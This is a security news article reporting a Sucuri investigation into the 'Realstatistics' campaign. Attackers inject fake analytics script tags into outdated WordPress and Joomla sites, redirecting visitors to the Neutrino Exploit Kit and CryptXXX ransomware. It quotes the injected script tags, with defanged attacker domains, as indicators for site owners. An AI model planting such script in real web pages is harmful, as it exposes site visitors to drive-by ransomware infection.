Realstatistics campaign leads to ransomware via compromised sites

Threat actors in the wild are behind the Realstatistics campaign are leveraging on out-of-date CMSs to deliver the CryptXXX ransomware.

Security experts from Sucuri security firm have spotted a new ransomware-based campaign dubbed ‘Realstatistics’ conducted by threat actors in the past two weeks.

“Our Incident Response Team (IRT) has been tracking a mass infection campaign over the last two weeks ( codenamed “Realstatistics“). This campaign has compromised thousands of websites built on the Joomla! and WordPress Content Management System (CMS).” states Sucuri in a blog post. “We have codenamed the campaign “Realstatistics” because of the domain being used by the attackers”

Experts estimated that over 2,000 websites running out-of-date CMSs have been already infected, and at least 100 new websites are infected every day.

The vast majority of the infected websites (90 percent) is running an older version of CMS platforms, 60% of them is based on WordPress and Joomla.

The experts discovered that threat actors are injecting the following fake analytics code into the PHP template of every compromised site:

<script language="JavaScript"

src="http://realstatistics[.]info[/]js/analytic.php?id=4"

<script language="JavaScript"

src="http://realstatistics[.]pro[/]js/analytic.php?id=4"

The analysis of compromised websites revealed that threat actors behind the Realstatistics campaign are most likely exploiting vulnerabilities in plugins to hack them.

The domain realstatistics[.]info was the first spotted in the wild around June 9th, later on Jul 1st attackers switched on realstatistics[.]pro. Both domains are still being used by the attackers.

The researchers noticed that the malicious campaign redirects visitors to websites hosting the Neutrino Exploit Kit used to deliver the CryptXXX ransomware. Traffic hijacking is obtained by injecting a malicious JS script loaded from these two domains.

If you want to check if your website is infected use the Sucuri SiteCheck, or simply look for the fake analytics code reported above.

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – Realstatistics campaign, ransomware)

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.